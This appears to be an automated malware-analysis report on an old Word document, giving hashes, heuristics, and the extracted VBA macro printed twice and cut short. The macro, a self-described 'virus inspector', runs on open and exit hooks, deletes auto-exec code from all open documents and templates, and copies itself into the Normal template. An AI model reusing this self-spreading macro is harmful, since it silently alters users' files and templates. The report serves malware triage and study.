Office (OLE) malware analysis — malicious · 991eeee9e71d1acf

MALICIOUS

Office (OLE)

48.5 KB Created: 2000-10-18 07:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-03

MD5: d7519a705e449aa91ace6dfc977dad18 SHA-1: 2aea1a52dcc1860a081fe4eba56c3f3c20b25f8a SHA-256: 991eeee9e71d1acf8a452a780ed9ca142c87866070fea7aaf397e93d6b1c8d99

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, specifically triggering AutoOpen, Document_Open, and Auto_Close events. The presence of legacy WordBasic auto-exec markers and the high percentage of slack space suggest potential obfuscation or packing. The VBA code itself appears to be a macro inspector, but its functionality is truncated, making it difficult to determine the exact payload. However, the presence of these auto-exec macros strongly indicates an attempt to run malicious code upon document interaction.

Heuristics 6

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 49,664 bytes but its declared streams total only 16,486 bytes — 33,178 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9249 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9249 bytes
SHA-256: `4d329c394d4c7f370e27a7d26eba99466e692afb23ea6791e6b68f94ad2aac6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VirusInspect" ' Inspector Version 8.2 Option Explicit Dim KillCount As Integer Dim sAutoNames As Variant Dim bInited As Boolean Dim LatestVer As Double Dim g_VBCom As Variant Dim DetectedList As New Collection Const Logo As String = "Wu's Macro Virus Inspector " Function Detected(doc As Variant) As Integer Dim i As Integer For i = 1 To DetectedList.count If (doc.Name = DetectedList.Item(i)) Then Detected = i Exit Function End If Next Detected = 0 End Function Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean) Dim i As Integer i = Detected(doc) If (f) Then If (i < 1) Then DetectedList.Add (doc.Name) End If Else If (i > 0) Then DetectedList.Remove (i) End If End If End Sub Sub ClearReg() While DetectedList.count > 0 DetectedList.Remove (1) Wend End Sub Sub DeleteCode(cm As Variant, ByVal st, n As Long) KillCount = KillCount + 1 Call cm.DeleteLines(st, n) ShowStatus ("Delete From Line " & st & "to " & st + n) End Sub Sub KillSub(cm As Variant, ByVal Name As String) Dim i, n As Long 'Dim cmd As CodeModule If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then Exit Sub End If On Error GoTo Err i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc) n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc) If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then Call DeleteCode(cm, i, n) End If Exit Sub Err: End Sub Sub KillAutoMod(md As Variant) Dim Name As Variant For Each Name In sAutoNames If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then Call KillSub(md, "MAIN") End If Next Name End Sub Sub KillVirus(doc As Variant) 'Document) 'VBProject Dim prj As Variant 'VBProject Dim obj As Variant Dim Name As Variant Dim j, n As Integer Dim md As Variant 'CodeModule Dim VBCom As Variant 'VBComponents Dim count As Integer Dim saved As Boolean Call Init If (Detected(doc)) Then Exit Sub End If saved = doc.saved count = KillCount Set prj = doc.VBProject Set VBCom = prj.VBComponents For j = 1 To VBCom.count Set md = VBCom.Item(j).CodeModule Call KillAutoMod(md) Next j For j = 1 To VBCom.count Set md = VBCom.Item(j).CodeModule ShowStatus "Scanning In " & md.Name For Each Name In sAutoNames Call KillSub(md, Name) Next Name Call KillAutoMod(md) Next j Call SetDetectedFlag(doc, True) ' prj.VBComponents(1).Activate If (KillCount > count) Then ClearReg If (saved) Then Call SafeSave(doc) Else doc.saved = False End If Else If (saved) Then doc.saved = True End If End If End Sub Sub DetectAll() Dim doc As Variant 'Document For Each doc In Documents Call KillVirus(doc) Next For Each doc In Templates Call KillVirus(doc) Next If (KillCount > 0) Then ShowStatus "É±µ�E" & KillCount & "¸ö²¡¶¾£¡µ«Î´±£´�E" Else ShowStatus "Î´·¢ÏÖº�E¡¶¾£¡" End If KillCount = 0 End Sub Sub Init() Dim i As Integer Dim obj As Variant If (bInited) Then Exit Sub End If 'MsgBox "Init" sAutoNames = Array("Document_Close", "Document_Open", _ "AutoClose", "AutoOpen", "Document_New", "AutoExec", _ "AutoNew", "AutoExit") Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive) Set obj = Application.NormalTemplate Call InfectTo(obj) KillCount = 0 ClearReg bInited = True End Sub Sub AutoExec() 'Wu's Sub Call DetectAll End Sub Sub AutoExit() 'Wu's Sub Call DetectAll End Sub Sub AutoOpen() ' ... (truncated)

SHA-256: 4d329c394d4c7f370e27a7d26eba99466e692afb23ea6791e6b68f94ad2aac6e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VirusInspect"
' Inspector Version 8.2
Option Explicit


Dim KillCount As Integer
Dim sAutoNames  As Variant

Dim bInited As Boolean
Dim LatestVer As Double
Dim g_VBCom As Variant
Dim DetectedList As New Collection
Const Logo As String = "Wu's Macro Virus Inspector "



Function Detected(doc As Variant) As Integer
Dim i As Integer
For i = 1 To DetectedList.count
  If (doc.Name = DetectedList.Item(i)) Then
    Detected = i
    Exit Function
  End If
Next
    Detected = 0
End Function
Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean)
Dim i As Integer
i = Detected(doc)
If (f) Then
    If (i < 1) Then
        DetectedList.Add (doc.Name)
    End If
Else
    If (i > 0) Then
        DetectedList.Remove (i)
    End If
End If
End Sub
Sub ClearReg()
While DetectedList.count > 0
    DetectedList.Remove (1)
Wend
End Sub



Sub DeleteCode(cm As Variant, ByVal st, n As Long)
KillCount = KillCount + 1
Call cm.DeleteLines(st, n)
ShowStatus ("Delete From Line " & st & "to " & st + n)
End Sub
Sub KillSub(cm As Variant, ByVal Name As String)
Dim i, n As Long
'Dim cmd As CodeModule

  If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then
   Exit Sub
  End If
  On Error GoTo Err
   i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc)
   n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc)
    If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then
     Call DeleteCode(cm, i, n)
    End If
    Exit Sub
Err:
End Sub
Sub KillAutoMod(md As Variant)
Dim Name As Variant
        For Each Name In sAutoNames
               If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then
                        Call KillSub(md, "MAIN")
               End If
        Next Name
 
End Sub

Sub KillVirus(doc As Variant) 'Document)
'VBProject
Dim prj As Variant 'VBProject
Dim obj As Variant
Dim Name As Variant
Dim j, n As Integer
Dim md As Variant 'CodeModule
Dim VBCom As Variant 'VBComponents
Dim count As Integer
Dim saved As Boolean

Call Init
If (Detected(doc)) Then
     Exit Sub
End If

 saved = doc.saved
 
    count = KillCount
    Set prj = doc.VBProject
    Set VBCom = prj.VBComponents
    For j = 1 To VBCom.count
     Set md = VBCom.Item(j).CodeModule
        Call KillAutoMod(md)
    Next j
    For j = 1 To VBCom.count
    Set md = VBCom.Item(j).CodeModule
        ShowStatus "Scanning In " & md.Name
        For Each Name In sAutoNames
         Call KillSub(md, Name)
        Next Name
        Call KillAutoMod(md)
    Next j
    
    Call SetDetectedFlag(doc, True)
'    prj.VBComponents(1).Activate
    If (KillCount > count) Then
        ClearReg
        If (saved) Then
            Call SafeSave(doc)
        Else
         doc.saved = False
        End If
    Else
     If (saved) Then
     doc.saved = True
     End If
    End If
 
 End Sub
 
 
 
 
 
Sub DetectAll()

Dim doc As Variant 'Document
For Each doc In Documents
 Call KillVirus(doc)
Next
For Each doc In Templates
 Call KillVirus(doc)
Next
If (KillCount > 0) Then
    ShowStatus "É±µ�E" & KillCount & "¸ö²¡¶¾£¡µ«Î´±£´�E"
Else
    ShowStatus "Î´·¢ÏÖº�E¡¶¾£¡"
End If
KillCount = 0
End Sub

 
 
 
  
 
Sub Init()
    Dim i As Integer
    Dim obj As Variant
    
    If (bInited) Then
        Exit Sub
    End If
    'MsgBox "Init"
    sAutoNames = Array("Document_Close", "Document_Open", _
    "AutoClose", "AutoOpen", "Document_New", "AutoExec", _
     "AutoNew", "AutoExit")
    Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive)
    Set obj = Application.NormalTemplate
    Call InfectTo(obj)
    KillCount = 0
    ClearReg
    bInited = True
End Sub
Sub AutoExec() 'Wu's Sub
 Call DetectAll
End Sub
Sub AutoExit() 'Wu's Sub
 Call DetectAll
End Sub
Sub AutoOpen() '
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.